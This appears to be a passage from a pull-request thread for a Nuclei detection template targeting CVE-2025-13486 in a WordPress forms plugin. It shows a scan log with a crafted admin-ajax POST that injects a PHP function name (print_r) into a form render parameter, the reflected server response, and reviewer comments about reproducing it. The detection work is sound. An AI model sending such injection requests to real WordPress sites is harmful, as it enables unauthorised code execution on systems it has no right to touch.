":"application\/vnd.ms-excel.sheet.macroEnabled.12","xlsb":"application\/vnd.ms-excel.sheet.binary.macroEnabled.12","xltx":"application\/vnd.openxmlformats-officedocument.spreadsheetml.template","xltm":"application\/vnd.ms-excel.template.macroEnabled.12","xlam":"application\/vnd.ms-excel.addin.macroEnabled.12","pptx":"application\/vnd.openxmlformats-officedocument.presentationml.presentation","pptm":"application\/vnd.ms-powerpoint.presentation.macroEnabled.12","ppsx":"application\/vnd.openxmlformats-officedocument.presentationml.slideshow","ppsm":"application\/vnd.ms-powerpoint.slideshow.macroEnabled.12","potx":"application\/vnd.openxmlformats-officedocument.presentationml.template","potm":"application\/vnd.ms-powerpoint.template.macroEnabled.12","ppam":"application\/vnd.ms-powerpoint.addin.macroEnabled.12","sldx":"application\/vnd.openxmlformats-officedocument.presentationml.slide","sldm":"application\/vnd.ms-powerpoint.slide.macroEnabled.12","onetoc|onetoc2|onetmp|onepkg":"application\/onenote","oxps":"application\/oxps","xps":"application\/vnd.ms-xpsdocument","odt":"application\/vnd.oasis.opendocument.text","odp":"application\/vnd.oasis.opendocument.presentation","ods":"application\/vnd.oasis.opendocument.spreadsheet","odg":"application\/vnd.oasis.opendocument.graphics","odc":"application\/vnd.oasis.opendocument.chart","odb":"application\/vnd.oasis.opendocument.database","odf":"application\/vnd.oasis.opendocument.formula","wp|wpd":"application\/wordperfect","key":"application\/vnd.apple.keynote","numbers":"application\/vnd.apple.numbers","pages":"application\/vnd.apple.pages"},"admin_url":"https:\/\/localhost\/wp-admin\/","ajaxurl":"https:\/\/localhost\/wp-admin\/admin-ajax.php","nonce":"57fd40d929","acf_version":"6.6.2","wp_version":"6.8.3","browser":"chrome","locale":"en_US","rtl":false,"screen":"acfe_form","post_id":1,"validation":true,"editor":"classic","is_pro":true,"debug":false,"StrictMode":false};
</script>
<script>
acf.doAction( 'prepare' );
</script>
</body>
</html>
[INF] [CVE-2025-13486] Dumped HTTP request for https://localhost/wp-admin/admin-ajax.php
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15
Connection: close
Content-Length: 105
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=7a062d141a46ed1df3763f558d0ecb0e
Accept-Encoding: gzip
action=acfe/form/render_form_ajax&nonce=57fd40d929&form[render]=print_r&form[custom_payload]=SNwKHYVDmIPO
[DBG] [CVE-2025-13486] Dumped HTTP response https://localhost/wp-admin/admin-ajax.php
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private
Content-Type: text/html; charset=UTF-8
Date: Thu, 04 Dec 2025 06:46:29 GMT
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
Referrer-Policy: strict-origin-when-cross-origin
Server: Apache/2.4.65 (Debian)
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Powered-By: PHP/8.3.28
X-Robots-Tag: noindex
<form method="post" class="acfe-form" data-cid="69312e45dec81"> <div id="acf-form-data" class="acf-hidden">
<input type="hidden" id="_acf_screen" name="_acf_screen" value="acfe_form"/><input type="hidden" id="_acf_post_id" name="_acf_post_id" value="0"/><input type="hidden" id="_acf_validation" name="_acf_validation" value="1"/><input type="hidden" id="_acf_form" name="_acf_form" value="UWdjay9aY0hUbGx4RG90Y1FERW9tQjN2dlF3MGl5bEt3TFVEcnAxUkY2eVVSMmkyWTNHcFVqSmdDbGtvRWh6V3lMbU41QWVLTWNCMi83WWY3TE9POXFRZExrc1c5VEdjRkZ0dVh2WXg2WG04K1F1S0pVMHgrSzQ0djBvQy9aOEt6eGVzKzBVdFA0QW1ackszYnVJU0g3VEFFOE5CMjFFRG1KU05LdUkyQjBvY3R0WUFBd2FMeGNmcmJaQUVUYlBiMVF6S3dCMGVCM05zMXQvdWxBakRacFQ3bllyR3pRQm1iY3ZTUWdOK2FORFlzQXh2WWg4bklsd2R1dnVuVWtSalF2Q3pCa2xwcFJSSVdPcG5vWG8xVmgwYldqd0kzQTFITXZ5K2hRWUdOcGpOOFhuR0JpbkpFOXpuR2RSMEVsTnkrWVdaQ1RQUzBqem1yakF0bWJFWTRMY3pYUVlockh3T2hTQUcrVVZzVnVEYVVCV0t1eFRKOFFjVFZRT0VNUkFNbkZhYWZBMkltN1dqSWxabEdoU283azAyVFQ2bEpVcFI4eFFudnY0ZFBybVpNamZXczdJZnVXQzJkalI1eDMwSU0wb0dRdGlBMFpPU2g4YW1JQWhkSWFVRkt0VVdJb2psRVJTWFNrZnV1UENQM2c4cVBNOTVoNnU2OHc3aGo5M3ZjRXVocHhSSEtReVJLamg5OVlpVmtabm91bnFFdE9CVk50aHpzR3JPMzkrWUJ1SU15Y2NrZlZNZms2bW0vcnJkS09Sc0VyUzlpc0dtM3VNN29kL1NJVldNQ2JvclhSNEJYNmo1U21HM2J2MVFmTVJXZzNXSXVwNElqVEFhWWFLNjlPOUlSYk50blBHVEc4M1g3bzlKR09UYkZJalVibGl3aXRBVjlINlpIckdabkNCU1c5UG5reW16eHc1YjdWU3Zkb3NHaHJmb2tMWVc1VEhsd2VHMXZLYTJKUjVZc0srenhobVZqNjdOZlFtR3lOTWdiMVV5Z2ZnMXRtaFBOcWNaUHhxWXkxU2FsL3ZycXdhckVKWHlFS1JaeHY2RzNGV08vQ3p6OFJJL0NYa2hrZlloNHJNNk44bHJwYzdEZHp3NW4wQVh5eFBWc3djcWZzbmpHL2RsVjNsT2FKblAvZUZQMlZRaVBUbEc5K2I4NVFKV0lMNkY0N3dmeW13Zm5MY0tmQXJHWlBtTml0bzF5Wk1OaFlkUGxQbDkzQ3pDT1U3dlNRekRmZERIYisrb3BkN0EvQWxaQ05uM25uQlREUGVJNlhPUFNjenE2NmpNWVlJZ3pHcGt6ejhSdVNlWHBqV0ZXYU0rMkxpTkx0dmdUZ2FOdml6QllzNWU2M01pMUFNMElpVG41elBLeFA4VjFWV0RPMjB5M0VSdmFiYm10U2I2VXYrVVZ3QmtXcnQwL2k2dUNodjFmY0pKQmpINE9HUGNDY1ZWaTdUR2U0cGZoblRkSlJERlZkNFVuOE5uMWxtSUMyMnFYeEpzZmhKVyt2Njh0MWw3K01rSFB6TjlRTWhKamxRV2duOGFlSjh5OUluRnkvdHcrT1pxVG1yQzJqWkFZSkV6VUxucFV0UTk1WWx1dDNjWFR3K2VBQmlWVWZjd3FmYUkvSkpqd3QzYnMwYU91alJubDFEM1A4OUQvOVhjc1NRZ3orUmFsOHQ5alRtdnd0ZnYyak90M0J4OWlMbWM0dDJtQ2ZPdDJNWHZwS2p3cEpoTU42T1BMUHFLeUtveHJGcFZUVVpOVGJGckt1YWRscXVQRFlVRklJWldsWUN3ME0xa3RHcmJLcjRlbzZtT0tGYXl4eCtHYnVramdGVWVUbGJpaFVCRnlraHpoeFgwRGRPY0lYL0J0Myt3STdNb3FTVXJsVFF1V2ZQYXZicmdUT09ZM1VnRkxXbXdMUkNPUmNnZGtnQUhZOGNvdGY2TXQydnFjdjM3QkVDOFNjMVA5aUgwaFpROGhrUFhiWDJFSStrUzNQa0UrQ3psay8vaGpkd1BrRkZkdktYZy9PL1E1eDZKSFBJMldISjVPWVZLRFlGdG83MS9ITlhvMVZ2OWtmUGpvRStSK3ZHQ2JiaHBSUEZnRHBkUkM4WnluTnErUWQrdFRtaGhoU3ZIbWtPUFpJaVl1YWNYSEdqOGNhVnZJYzQyallFVitVSGY4OGZFNlFjd3FlMnFybnc3K2xmMUpBcnMyWS9sZzVvb3d6VVpsS0hIQ3JpQjhyS0t1anVjd3dWdkQwRlBkQjV2dkUwdTBFN2Z3VlpCeXVqK2Z3eHR5TTk0Njh3NmtrMDlsam5hWFlhSXUrN3FGVXpHRjBoM1VnSzZ4NFZWMkNQTDNKbTdPbWZXUXR1Tjg4aVhCMWJ2NXZKV2NVclNsQkVXeWdZaVNZL1h3MVI3L0RCNTZydGluSWQ5QjBhcE5qbzMyV2x2WjduUEFtVFA0NU1vNGRtL2k1TlNHT253dW8vMXd0L3pzYWlQcDF5MlYyWE5URG9XVk1FMVRGS095bmpDQ2YzQmRJbHBGanduSHhXSm53L3JYUjJ5Q1dFdkllRWs4aHVtVVExNWx5U25meXRsL3lzYmNPWWh4d25Hd2lpc0QrZmpmNnMySmJJT084SDRyL3lJemZLc05nT2tnTlhlRTJuNllERjJEWmw4T21xYmcwblIwS3JSQkQ2dk1EOGppRy9xYUhpekNoTnNxQnM3bW82UklESHVlNWZwVTFmYlpGd2xOL1pCZEl5bXMrMEdsVi9qRWhtaDFaeTd5T0sxd09mZ0xPMmpVNXlNSVVuaEFVcS9rZWZXRE9BZGhCaEVTdDhHUFdYa3ZZWVo1V1VHcXluc01qdTAzR2ppaTNsclZYV1hyemg3cm9naDhnbTZFTVhCcGJoc1A3dHhlQjlNd25sM3ZhUzVZcC9DY3ZROTQwS0VSSGUvblNISzZWYVRBZ0tHOURHdzl6K3dZUHFPaXlkWGNjTWt6YWVxR2JFRGs2Ny9oZ3BEZVYybTduMDNxSUNVNm16SlVEUE40OGx1d0psaUxPZGwrN2tOZWVvMW9lUEFrTUs5dVkxSkt1ZFppY1lvVHhMRG1DelpmUzZwTkxQSmRVOGdQdVF2MDNRclFGTmJMWU1UcGJoLzE4VW5lY25udmRyMWlBbHh6VlFhRXB2eGtrZFJtV0RNdUlDdC9CODB4a2xQWjVlSUZQYmVwZXFubTVvU1Byd21NZmFySERQWVRaSEN1eVpFOG5sWU9Vd1NSQ2Z4S014QU01L01ubHRKQnNETVFIZ3pheEFvWXBMSUYxSlVJeUJhNi9RU0FoTkFsQnNUWWFHcGhXRUlkTFh0cGtCRUt6blRwd0ZSUmV4dU5xcTFZN3ZjQ2hKcEt3TWZhaklBMGFqdExWbEhBNEZnZTZlRXdINm9EdlJhaXg3VS9uUE1lL0pveFFWdUhXL0ltZVF0WE9BMlQ1NmRmdUVGOEVlYThLSGgrU2Q3WE4rSHBYd2dNV1U0Qzg0NHk2SHZMMVJYN0V4eS9zWXIxYlRWYnNybi9yRit4QUNKNlRyKzRJL0E0LzhobUkwWk9hNlBpdzF5YjJnUDByV29CYUJvMFY5akRpckhWNVZkLzNFTDI3eHgyb21LWW5QS0FxcFZ0cXAxM2ZDNE5wUmRWRC84VEZrRVNjT0NiZE9iMDVTVy9pQXJxbkJRYWdXY29yalp1dkVaRmNPNEZYQnlQbkloeHFrbWJQUWdROWZKQzM2eDlIbWFtK2lPeGNDdys3dEgzcGhmU0xQc3Ira3pGMnpEdkk0RW41ZDRJalVZWHpyRjEwcDZCQkZQZXp6Vk1CTUVjYTlqd25nNGZTcEdGSVA4Yk1xWWpaSTA2L3hBTlJhRnNlMXBtVjJXUlBYU0lTWFZpR0dYMjhKanNMUnpaSDhxaitmVHVrTk9YWDQxTjAraTR4UUZ4MlRNMzJMeUVMNTY5WU04RHllMVQwY1duNlpNR3FSNUpEZ3Vwa1NTbDM4SFlXVW0xai9EU2d0cGxvMDZMTHNIMzNTNE05b2NlWmlrcEtIOGkyUEdlaDRkNDZsK3dhU09YcjBIVGRiekY5QlBQTXBNNTZJSk1YTjJwcjRtaUFJUTh3VDRESndabVZoTy9WdFFET2hBMkFnMjFlZktUQnltZ1FoUHE1dmx1WXBlc2YxU0VVRWVidjNrQ1E5blplenhuSm8rcXRWcGdxOXdCZ2JhRkVwSERHSTg2YS96TVV5V0hPYnV1bmRuQnB4NmR1NW1aS1pxdzVwNlpnUlVjM2UxUGVZRlFDTXJXMjEyYUF2eHljMUNrWVlVRmRHMFJJTnNMMFZuV2U1elNXR3o0bWRvdFNrSjQxNmdGZURycHVqcGI2OWRUbVNBeXFRR1JRR2pWNjhPMTFmRWVrNENjWFozTlhMYnRyTEpnbHhydTlmZHIzSmVMdHJoYWtQSE5neW1yUXFnYlVwR3lQSlNvZHlaV1ZmVk5EUmNUM3BNSVpwQTZTd2JKRHI2V0ZLbTZoVXdXKzBpdzFpcG1ibU80OE4wM0hOcjhrbzg0MDIzcDFJZ0ZTcHl5cWpGbnJSc0xGalIvQ25lMXVKaGMydFo2eHF0Q2ptWkQ3WTNCVnRUVjVjTERLdlNxU3RXbTBxWVljcVNTbG0yS1ViQ05pT1NoalJmZVJ5ZmtCUXBkMlZGY1hiL214V29MVzVERXEvMEJkL2hqdUhhcDF0a2MxWHJ1amZwSW8yV2xndFpUVTNvWFNjRGNSc2lpVXMya051b0F6OVQvRUJueHpvM0lXakxHWmdleFdPZlFISSs0eGk0eS9iLzI4SlpUUmQzYmtRQ2cwWjI3QTdNUUJORGFyYyt4L2FGUDk5TjdGZ29XY3lXVEs5M2ZBN2FQN01VTTlCVC8zVTNQVXo0d1o1L0Z2UWpTZ0ZFQlJuSk4wR29Fd1ZibzRFV1Q2dzREb2xSTENPbFZhOXpCUjY4aEdpRXkrci9BSEt5VVJEMHVQRWhObm9MT2I3WXB5d1VLL2dTWFRBUDRQRFVzSnJLaXVMMlYzanQwL1prcFFZYVdEdThIaU93TGVXTHBJOFFyS2lZK3R5eTdsRUFSVXBVTURaWkVlcUNnMWhTWFcrNzBTdUJhSkxHK3lSSVhaY2NJSHlqcmxqNmN1TnZ2M1ZIbytNeXU1T0xHY0tHM0lnNnhSeWRvRTBiQ2JZQ2pkREczOVZ6c0Fta2FrQng3eFFmUWJJKzRERU43cDFrWmZGcFpLa2RTaFp1N055K2F4ZXNScHdPbGh5dUpXZ09PRHVGdjkxWndteVNyeXJ5bmpiTVFjTjNHcTQvbHBNbDJVSnNTZzBMTDBjOWJRUzJwNkMrZUhQc01JQjFCVTN3elpDL05XeDJNVTBLeDIzT3p0MXRnSExUeStRdXpSZkkySFhTbm5MUnF1dW9VMzN0SlRQVjliQ2I5VGYyT09jSkZwWEJUc25RZFlDZzB1U1loKzFEa3BSY09JellVWDNUYzNlWW9LazVTRnRiZ1ZTRGlLaWlmOFF6REJKRHVYVFIwZ28xVTl0UG1TMjBVaEhqaUZlTnJnaXo3K0hKWVAxS3RXMnhlRkJ5V3hRMnRJeHc4OUFjV3hZPTo6AO2nJLBXW+8RqIQARwg+fw=="/><input type="hidden" id="_acf_nonce" name="_acf_nonce" value="9bf9e87119"/><input type="hidden" id="_acf_changed" name="_acf_changed" value="0"/> </div>
<div class="acf-fields acf-form-fields -top"><div class="acf-field acf-field-text acf-field--validate-email" style="display:none !important;" data-name="_validate_email" data-type="text" data-key="_validate_email">
<div class="acf-label">
<label for="acf-_validate_email">Validate Email</label></div>
<div class="acf-input">
<div class="acf-input-wrap"><input type="text" id="acf-_validate_email" name="acf[_validate_email]"/></div></div>
</div>
Array
(
[ID] => 0
[name] =>
[title] =>
[active] => 1
[field_groups] => Array
(
)
[settings] => Array
(
[location] =>
[honeypot] => 1
[kses] => 1
[uploader] => default
)
[attributes] => Array
(
[form] => Array
(
[element] => form
[class] =>
[id] =>
)
[fields] => Array
(
[element] => div
[wrapper_class] =>
[class] =>
[label] => top
[instruction] => label
)
[submit] => Array
(
[value] => Submit
[button] => <input type="submit" class="acf-button button button-primary button-large" value="%s" />
[spinner] => <span class="acf-spinner"></span>
)
)
[validation] => Array
(
[hide_error] =>
[hide_revalidation] =>
[hide_unload] =>
[errors_position] => above
[errors_class] =>
[messages] => Array
(
[failure] => Validation failed
[success] => Validation successful
[error] => 1 field requires attention
[errors] => %d fields require attention
)
)
[success] => Array
(
[hide_form] =>
[scroll] =>
[message] => Form updated
[wrapper] => <div id="message" class="updated">%s</div>
)
[actions] => Array
(
)
[render] => print_r
[custom_payload] => SNwKHYVDmIPO
[post_id] => 0
[uniqid] => acfe_form_-44
[cid] => 69312e45dec81
[map] => Array
(
)
[map_default] => Array
(
)
)
</div> <div class="acf-form-submit">
<input type="submit" class="acf-button button button-primary button-large" value="Submit" /> <span class="acf-spinner"></span>
</div>
</form> <script type="text/javascript">
(function($){
if(typeof acf !== 'undefined' && typeof acfe !== 'undefined'){
acfe.set('forms.69312e45dec81', {"cid":"69312e45dec81","name":"","id":0,"field_class":"","hide_error":false,"hide_unload":false,"hide_revalidation":false,"error_position":"above","error_class":"","messages":{"failure":"Validation failed","success":"Validation successful","error":"1 field requires attention","errors":"%d fields require attention"},"scroll":false,"hide_form":false,"success":false});
}
})(jQuery);
</script>
[CVE-2025-13486:random-string-reflected] [http] [critical] https://localhost/wp-admin/admin-ajax.php
[INF] Scan completed in 182.09042ms. 1 matches found.
Additional References:
- Nuclei Template Creation Guideline
- Nuclei Template Matcher Guideline
- Nuclei Template Contribution Guideline
- PD-Community Discord server
would you mind sharing setup for vulnerability? couldn't replicate on my end. not competing for the bounty just curious
Hi, We tried setting up the forms and other components, but they didn’t work as expected, So we are closing this PR for now. Once you have identified the issue, kindly reopen it or create a new PR. Thank you.
hi @pussycat0x i have sent updates about forms setup via email and reopend a PR #14285